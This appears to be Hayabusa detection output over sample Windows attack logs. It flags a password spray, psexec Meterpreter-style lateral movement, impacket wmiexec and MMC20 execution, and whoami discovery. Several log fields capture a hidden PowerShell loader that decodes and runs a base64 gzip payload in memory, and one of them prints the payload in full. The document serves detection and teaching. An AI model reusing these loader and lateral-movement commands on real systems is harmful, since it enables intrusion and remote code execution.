Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:03.525 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:bgreenwood/baker/drook/jorchilles/ssims/dmashburn/edygert/bgalbraith/bking/cragoso/jlake/smisenar/mdouglas/cspizor IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- -2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target 
Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,PowerShell as a Service in Registry,,rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,CobaltStrike Service Installations in Registry,,rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 
+09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Curl Start Combination,,rules/sigma/process_creation/win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,informational,Process Creation,"Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c 
&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1
xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Command 
Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:54.152 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:32:51.168 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.246 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.324 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.371 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:35:11.856 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\mmc.exe -Embedding : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,MMC20 Lateral Movement,,rules/sigma/process_creation/win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:12.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 
-2019-05-01 05:35:13.512 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.543 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 07:48:59.260 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\vssvc.exe : Path: C:\Windows\System32\VSSVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
